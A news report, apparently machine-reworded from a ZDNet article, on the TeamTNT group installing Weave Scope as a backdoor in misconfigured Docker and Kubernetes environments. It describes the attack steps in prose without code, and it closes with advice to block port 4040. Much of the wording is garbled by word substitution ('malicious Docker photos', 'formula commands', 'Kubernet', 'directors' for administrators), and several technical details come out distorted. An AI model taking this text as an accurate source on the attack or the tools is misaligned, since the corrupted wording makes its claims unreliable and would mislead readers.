TeamTNT has added valid Weave Scope to its attack toolbox in an effort to infiltrate cloud environments.
According to a new study published through cybersecurity company Intezer and Microsoft this week, this could be the first time Weave Scope has been included in cloud-based attacks.
TeamTNT has been connected in the past to attacks on Docker and Kubernetes installations. Last month, risky players connected to a cryptocurrency extraction botnet capable of stealing AWS credentials from servers. Your organization is also known for uploading malicious Docker photos to Docker Hub. .
Microsoft claims that the malicious photos detected in mid-August were deployed from a repository that was not noticed in previous attacks. One Docker image, in particular, pause-amd64: 3. 3, connects to a German-founded server using malicious scripts and other machines in the group.
The evolution of the group, however, is the abuse of Weave Scope.
Weave Works ‘ Weave Scope is open source tracking and visualization software for Docker, Kubernetes, distributed operating system in the cloud’ s 40 / DC / OS- 41; and AWS Elastic Compute Cloud (ECS), which enables users to monitor running processes and container network connections in cloud environments with a compromised interface. The software also allows directors to run shells on clusters as root and does not require default authentication.
See also: Important Cloud in 2020: AWS, Microsoft Azure and Google Cloud, Hybrids, SaaS Players
While a valuable and valid tool, TeamTNT benefits from poor cloud service configuration and open access to port 4040 to deploy the software as a backdoor.
“We see that cluster managers allow the public to access this interface as well as other similar services,” microsoft says. “Attackers, by adding this organization [TeamTNT], take advantage of this poor configuration and use the public to compromise Kubernet clusters. “
CNET: Five Online Cybersecurity Courses to Help You Be a Pro and Explore a New Job
To install Weave Scope, TeamTNT will first verify to locate an exposed Docker API. If one is discovered, a new privilege container, a blank Ubuntu symbol, is created, as well as commands to mount via the main registration formula and to load and run cryptocurrency miners.
The next step in the attack chain is to configure a local user you like on the host server to reconnect SSH and install Weave Scope.
“Attackers install this tool to map around their victim’s cloud and execute formula commands without implementing malicious code on the server,” the researchers explain. “As far as we know, this is the first time attackers have blocked valid third-party software to attack the cloud infrastructure. “
Essentially, this Weave Scope acts as a backdoor in cloud installations and gives attackers the ability to monitor systems, install applications, use compute resources, and start, prevent, or open shells in containers.
TechRepublic: how SMEs succeed over major cybersecurity challenges
While TeamTNT benefits from existing Docker poor configurations that lead to exposure over port 4040, researchers proposed that formula managers block incoming connections to that port and potentially activate security practices without accepting them as true in the cloud infrastructure.
“Poor configuration seems to be among the most popular and harmful access vectors when it comes to Kubernet cluster attacks,” Microsoft said.
Update 16. 38 BST: In reaction to the investigation, Weave Works issued a notice on how directors can prevent you from misuse of the tool.
Do you have any advice? Securely contact WhatsApp Signal at 447713025499, or more at Keybase: charlie0
U. S. citizen accused of administering Diamond Ponzi scheme and cryptocurrency scam
SushiSwap, creator of DeFi, returns $14 million in ETH to the project after causing the coin to collapse
Infosys acquires GuideVision as a component of the European momentum
IRS grants software to track privacy-oriented cryptocurrency transactions
By registering, you agree to the terms of use and knowledge practices defined in the privacy policy.
You’ll get a loose subscription to ZDNet’s Tech Update Today and ZDNet Announcement newsletters. You may opt out of receiving these newsletters at any time.
You agree to get updates, alerts and promotions from the CBS circle of family of companies by adding Today’s Technical Update from ZDNet and the Announcement from ZDNet. You can choose not to participate at any time.